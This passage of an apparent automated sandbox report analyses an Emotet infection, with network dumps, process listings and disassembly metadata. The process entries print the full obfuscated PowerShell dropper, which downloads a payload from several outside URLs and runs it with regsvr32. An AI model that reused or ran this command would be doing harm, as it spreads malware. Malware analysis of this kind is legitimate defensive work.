                                                                              May 23, 2022 08:54:13.094804049 CEST521INData Raw: 0a 00 00 48 36 64 a0 c7 85 74 0a 00 00 ea 18 bc 62 c7 85 78 0a 00 00 41 9b 1e e8 c7 85 7c 0a 00 00 33 26 07 a3 c7 85 80 0a 00 00 10 66 98 a4 48 8d 0d 21 f5 01 00 c7 85 84 0a 00 00 60 41 6e 4d c7 85 88 0a 00 00 4b ba c2 33 c7 85 8c 0a 00 00 ff b1
                                                                              Data Ascii: H6dtbxA|3&fH!`AnMK3*l?xuOKx(7&).Rtp9:|e:NKf3HuHBE3E3F
                                                                              May 23, 2022 08:54:13.094820023 CEST522INData Raw: 0f c3 51 d8 48 0f c3 51 e0 49 ff c9 48 0f c3 51 e8 48 0f c3 51 f0 48 0f c3 51 f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 83 7c 24 58 01 0f 85 ad 00 00 00 e8 9e 54 00 00 85 c0 75
                                                                              Data Ascii: QHQIHQHQHQu$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;sk
                                                                              May 23, 2022 08:54:13.094831944 CEST523INData Raw: 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89 84 24 88 00 00 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04 02 00 00 48 8b 84 24 b0 00 00 00 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48 89 44 24 40 48 8b 84 24 c8 00 00
                                                                              Data Ascii: +HD$hH$H@8H$H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H
                                                                              May 23, 2022 08:54:13.223062992 CEST525INData Raw: ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05 0d 72 02 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc cc cc 48 89 54 24 10 48 89 4c 24
                                                                              Data Ascii: HHH(=%rtrrRH(HT$HL$H(HD$0HHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:08:54:03
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:1
                                                                              Start time:08:54:04
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:2
                                                                              Start time:08:54:05
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                                                              Imagebase:0x7ff619710000
                                                                              File size:447488 bytes
                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:3
                                                                              Start time:08:54:14
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                                                                              Imagebase:0x7ff7c1920000
                                                                              File size:24064 bytes
                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:4
                                                                              Start time:08:54:19
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"
                                                                              Imagebase:0x7ff7c1920000
                                                                              File size:24064 bytes
                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:8
                                                                              Start time:08:54:30
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:9
                                                                              Start time:08:54:44
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:10
                                                                              Start time:08:54:45
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:11
                                                                              Start time:08:54:50
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:16
                                                                              Start time:08:55:28
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:18
                                                                              Start time:08:55:46
                                                                              Start date:23/05/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff78ca80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 00007FF9F1B933A2 Relevance: 1.6, Strings: 1, Instructions: 393COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.481890609.00007FF9F1B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1b90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: w`_H
                                                                                • API String ID: 0-3663660064
                                                                                • Opcode ID: 10097830abe4d1d1d56726fce0e3d48d4e58e8eb92bdb39a4df96b31ea368a97
                                                                                • Instruction ID: 6303db62a27e5e1ceb0caa78a5071ddfb58d0b4e7ee73a3b09635f0f3f3f3be5
                                                                                • Opcode Fuzzy Hash: 10097830abe4d1d1d56726fce0e3d48d4e58e8eb92bdb39a4df96b31ea368a97
                                                                                • Instruction Fuzzy Hash: C3D19031A08A498FDF85EF6CC495AF97BE1FF68301F54416AD419D72A5CB64EC828BC0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF9F1B950D5 Relevance: .7, Instructions: 653COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.481890609.00007FF9F1B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1b90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ebf68f84aac1a8a3add06ec35827e4759f0801ef1ed8e2daa4e6fc7c60b0bb36
                                                                                • Instruction ID: 71331924d2254554659107193fc7b166d0f09c8cb6e6e2ca1a761ea6bc96399f
                                                                                • Opcode Fuzzy Hash: ebf68f84aac1a8a3add06ec35827e4759f0801ef1ed8e2daa4e6fc7c60b0bb36
                                                                                • Instruction Fuzzy Hash: B322D330A0CA898FDB85DF18C495AB97BF1FF59301F5541AAD049C7296DB68BC82CBC1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF9F1B922B9 Relevance: .2, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.481890609.00007FF9F1B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1b90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73c8cbbfd0727451028ae396455df831f9d261cbcd20fa8dcca88e4273a5b554
                                                                                • Instruction ID: 2d77f6907bcf5922e3569ac58e8286e575b40bac61e204079394122a5f461dc2
                                                                                • Opcode Fuzzy Hash: 73c8cbbfd0727451028ae396455df831f9d261cbcd20fa8dcca88e4273a5b554
                                                                                • Instruction Fuzzy Hash: 6451E63190CA498FD305DB18D4517A5B7E1FF95320F8886FAE05DC72DACB68A98587C1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF9F1C61F04 Relevance: .2, Instructions: 170COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.482111579.00007FF9F1C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1c60000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 91488b636f96deae44d924d54db139a086386b1e19d67f483d4c1ff3058d8711
                                                                                • Instruction ID: 3c0b8f37cc2e23e5ed9246dc03ae1da20ddd7e47dc21ef4c961ffbe82138a6e7
                                                                                • Opcode Fuzzy Hash: 91488b636f96deae44d924d54db139a086386b1e19d67f483d4c1ff3058d8711
                                                                                • Instruction Fuzzy Hash: 0A41F432A1DB860FE7A9DA2C14112B97BD1EFA5A25B2845BFC05DC71C3DF58AC4643C2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF9F1B953A8 Relevance: .1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.481890609.00007FF9F1B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1b90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: adbb95f28d9f7912706107e114c437b82c01668e5a63234fc61e4a57c7e20e01
                                                                                • Instruction ID: aaf79366199e6fc5334a7908c783d0db60d64ae1283f2734588bde059e24445d
                                                                                • Opcode Fuzzy Hash: adbb95f28d9f7912706107e114c437b82c01668e5a63234fc61e4a57c7e20e01
                                                                                • Instruction Fuzzy Hash: 8141193065CB498FD798DF0CC491AB5B7E1FF99311B90057ED08AC739ADA61BC828B81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF9F1C61F50 Relevance: .1, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.482111579.00007FF9F1C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1c60000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48eb0c9aa84c6cccda2972c3f9e3887640cfb126472edfc54eae744fc8a1f995
                                                                                • Instruction ID: 33b44478f208cae2aef22df9e987e2bfbe368495bad176fbb7656f977656031a
                                                                                • Opcode Fuzzy Hash: 48eb0c9aa84c6cccda2972c3f9e3887640cfb126472edfc54eae744fc8a1f995
                                                                                • Instruction Fuzzy Hash: 52210222E1DB960FF7A9D66818112786AC0EFB1A2AB2845BED45DC71C2CF4C7C8502C3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF9F1B919C5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.481890609.00007FF9F1B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1b90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aa24d169894c9bccf47dbde038d63f19e62b71b74d3f3b4af4ba2d6cd03bcfd9
                                                                                • Instruction ID: 4d143c8888cc72ff7c7895e081b13e34f73202f2408453c1a5b67cf38a091338
                                                                                • Opcode Fuzzy Hash: aa24d169894c9bccf47dbde038d63f19e62b71b74d3f3b4af4ba2d6cd03bcfd9
                                                                                • Instruction Fuzzy Hash: 3F01447111CB088FD744EF0CE451AB6B7E0FB95324F50056EE59AC3695DA26E882CB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF9F1B954DF Relevance: .0, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.481890609.00007FF9F1B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1b90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0ea2ff7b92aa60625529012acdec09aa28f375ca15ce846b121a5ea89b5d72e5
                                                                                • Instruction ID: fd444ffed37c54378489b82dc28045ec759148a07758d6d517b09d7bf52c3f7f
                                                                                • Opcode Fuzzy Hash: 0ea2ff7b92aa60625529012acdec09aa28f375ca15ce846b121a5ea89b5d72e5
                                                                                • Instruction Fuzzy Hash: 7DF0547275CB444FD75CDA0CE8529B573D1E785331B50052EF08BC26D6EA16B8438686
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00007FF9F1B91EE0 Relevance: .3, Instructions: 348COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.481890609.00007FF9F1B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff9f1b90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbb7f2f6118bce5450f912262f404fdd06848fdb766dd737325a8ad807aab6e6
                                                                                • Instruction ID: 41ba604df4200fda7ad3b040396b686a5cd5246d5da8495a94b94303dab4bce5
                                                                                • Opcode Fuzzy Hash: cbb7f2f6118bce5450f912262f404fdd06848fdb766dd737325a8ad807aab6e6
                                                                                • Instruction Fuzzy Hash: 8AA11731A1C64A8FE329DB18D4906B1B7D0FF45311B9485BEC4AAC76DADB64B88387C0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:7.7%
                                                                                Dynamic/Decrypted Code Coverage:2.6%
                                                                                Signature Coverage:5.4%
                                                                                Total number of Nodes:1881
                                                                                Total number of Limit Nodes:45
                                                                                execution_graph 17423 7ffa52472c10 17424 7ffa52472c53 17423->17424 17425 7ffa52472c24 _updatetlocinfoEx_nolock 17423->17425 17427 7ffa52469360 LeaveCriticalSection 17425->17427 17427->17424 17428 7ffa5247d410 17433 7ffa5247d3e0 17428->17433 17431 7ffa5247d43c 17440 7ffa52480070 17433->17440 17436 7ffa5247d710 17437 7ffa5247d721 17436->17437 17438 7ffa5247d726 17436->17438 17437->17431 17445 7ffa52469360 LeaveCriticalSection 17438->17445 17443 7ffa52480083 _free_nolock 17440->17443 17442 7ffa5247d402 17442->17431 17442->17436 17444 7ffa52469360 LeaveCriticalSection 17443->17444 17444->17442 17445->17437 16675 7ffa5247c30d 16676 7ffa5247c31a get_int64_arg _get_printf_count_output 16675->16676 16677 7ffa5247c39d 16676->16677 16687 7ffa5247c3f2 16676->16687 16678 7ffa5246bd70 _invalid_parameter 17 API calls 16677->16678 16679 7ffa5247bb0e _LocaleUpdate::~_LocaleUpdate 16678->16679 16682 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16679->16682 16680 7ffa5247cc93 16680->16679 16685 7ffa5246bd70 _invalid_parameter 17 API calls 16680->16685 16681 7ffa5247b99c 16681->16680 16686 7ffa5247bada 16681->16686 16683 7ffa5247cd90 16682->16683 16685->16679 16688 7ffa5246bd70 _invalid_parameter 17 API calls 16686->16688 16687->16681 16689 7ffa5247b530 16687->16689 16688->16679 16692 7ffa5247b090 16689->16692 16691 7ffa5247b56c 16691->16687 16693 7ffa5247b0b7 16692->16693 16694 7ffa5247b168 16693->16694 16695 7ffa5247b1a6 _CrtMemDumpAllObjectsSince 16693->16695 16703 7ffa5247b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 16693->16703 16696 7ffa5246bd70 _invalid_parameter 17 API calls 16694->16696 16697 7ffa5247b347 _CrtMemDumpAllObjectsSince 16695->16697 16701 7ffa5247b1cf 16695->16701 16696->16703 16698 7ffa5247b359 WideCharToMultiByte 16697->16698 16699 7ffa5247b3ab 16698->16699 16700 7ffa5247b3c1 GetLastError 16699->16700 16699->16703 16700->16703 16704 7ffa5247b3d0 _calloc_dbg_impl 16700->16704 16702 7ffa5246bd70 _invalid_parameter 17 API calls 16701->16702 16701->16703 16702->16703 16703->16691 16704->16703 16705 7ffa5246bd70 _invalid_parameter 17 API calls 16704->16705 16705->16703 16706 7ffa5247e70c 16708 7ffa5247e717 get_int64_arg get_int_arg 16706->16708 16707 7ffa5247eadf 16733 7ffa5247ef10 16707->16733 16708->16707 16718 7ffa5247da75 16708->16718 16729 7ffa5247eec0 16708->16729 16709 7ffa5247eca1 16720 7ffa5246bd70 _invalid_parameter 17 API calls 16709->16720 16722 7ffa5247dbe9 _LocaleUpdate::~_LocaleUpdate 16709->16722 16712 7ffa5247eafd 16713 7ffa5247eb33 16712->16713 16715 7ffa5247eec0 25 API calls 16712->16715 16714 7ffa5247ec29 16713->16714 16727 7ffa5247eb49 _CrtMemDumpAllObjectsSince 16713->16727 16716 7ffa5247ebda 16714->16716 16717 7ffa5247ef10 25 API calls 16714->16717 16715->16713 16716->16718 16719 7ffa5247eec0 25 API calls 16716->16719 16717->16716 16718->16709 16721 7ffa5247dbb5 16718->16721 16719->16718 16720->16722 16725 7ffa5246bd70 _invalid_parameter 17 API calls 16721->16725 16723 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16722->16723 16724 7ffa5247ed9e 16723->16724 16725->16722 16727->16716 16737 7ffa5247f000 16727->16737 16744 7ffa5247ee40 16727->16744 16730 7ffa5247eed7 16729->16730 16731 7ffa5247ef07 16730->16731 16732 7ffa5247ee40 25 API calls 16730->16732 16731->16707 16732->16730 16735 7ffa5247ef2c 16733->16735 16734 7ffa5247ef4d 16734->16712 16735->16734 16736 7ffa5247ee40 25 API calls 16735->16736 16736->16735 16738 7ffa5247f026 _CrtMemDumpAllObjectsSince wcsxfrm 16737->16738 16741 7ffa5247f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16737->16741 16739 7ffa5247f276 _CrtMemDumpAllObjectsSince 16738->16739 16738->16741 16742 7ffa5247f146 _CrtMemDumpAllObjectsSince 16738->16742 16740 7ffa5247f29d MultiByteToWideChar 16739->16740 16740->16741 16741->16727 16742->16741 16743 7ffa5247f1b5 MultiByteToWideChar 16742->16743 16743->16741 16745 7ffa5247ee62 16744->16745 16747 7ffa5247ee6e 16745->16747 16748 7ffa5247f360 16745->16748 16747->16727 16749 7ffa5247f719 16748->16749 16750 7ffa5247f399 16748->16750 16753 7ffa52480170 23 API calls 16749->16753 16783 7ffa5247f4f2 16749->16783 16784 7ffa5247afb0 16750->16784 16753->16783 16754 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16755 7ffa5247f7c5 16754->16755 16755->16747 16756 7ffa5247afb0 _fflush_nolock 17 API calls 16757 7ffa5247f3b8 16756->16757 16760 7ffa5247afb0 _fflush_nolock 17 API calls 16757->16760 16769 7ffa5247f3ed 16757->16769 16758 7ffa5247f4c7 16758->16783 16788 7ffa52480170 16758->16788 16759 7ffa5247afb0 _fflush_nolock 17 API calls 16762 7ffa5247f43d 16759->16762 16764 7ffa5247f3ca 16760->16764 16763 7ffa5247f484 16762->16763 16765 7ffa5247afb0 _fflush_nolock 17 API calls 16762->16765 16763->16758 16768 7ffa5247f561 16763->16768 16766 7ffa5247afb0 _fflush_nolock 17 API calls 16764->16766 16767 7ffa5247f44f 16765->16767 16766->16769 16767->16763 16772 7ffa5247afb0 _fflush_nolock 17 API calls 16767->16772 16770 7ffa5247afb0 _fflush_nolock 17 API calls 16768->16770 16769->16758 16769->16759 16771 7ffa5247f56e 16770->16771 16773 7ffa5247f5b8 16771->16773 16775 7ffa5247afb0 _fflush_nolock 17 API calls 16771->16775 16774 7ffa5247f461 16772->16774 16773->16749 16778 7ffa5247f604 16773->16778 16776 7ffa5247afb0 _fflush_nolock 17 API calls 16774->16776 16777 7ffa5247f580 16775->16777 16776->16763 16777->16773 16780 7ffa5247afb0 _fflush_nolock 17 API calls 16777->16780 16779 7ffa5247b530 wctomb_s 19 API calls 16778->16779 16779->16783 16781 7ffa5247f592 16780->16781 16782 7ffa5247afb0 _fflush_nolock 17 API calls 16781->16782 16782->16773 16783->16754 16786 7ffa5247afc1 16784->16786 16785 7ffa5247b04b 16785->16756 16785->16769 16786->16785 16787 7ffa5246bd70 _invalid_parameter 17 API calls 16786->16787 16787->16785 16790 7ffa52480185 16788->16790 16789 7ffa5247afb0 _fflush_nolock 17 API calls 16791 7ffa524801c7 16789->16791 16790->16789 16792 7ffa52480326 16791->16792 16794 7ffa524801dc 16791->16794 16796 7ffa5247ab10 16791->16796 16792->16794 16800 7ffa52479290 16792->16800 16794->16783 16797 7ffa5247ab23 16796->16797 16798 7ffa5247ab35 16796->16798 16797->16792 16798->16797 16799 7ffa5246bd70 _invalid_parameter 17 API calls 16798->16799 16799->16797 16801 7ffa524792d8 16800->16801 16802 7ffa524792b6 __doserrno 16800->16802 16803 7ffa52479341 __doserrno 16801->16803 16807 7ffa5247938c 16801->16807 16802->16794 16805 7ffa5246bd70 _invalid_parameter 17 API calls 16803->16805 16804 7ffa5247945b 16814 7ffa5247fae0 16804->16814 16805->16802 16807->16804 16809 7ffa52479410 __doserrno 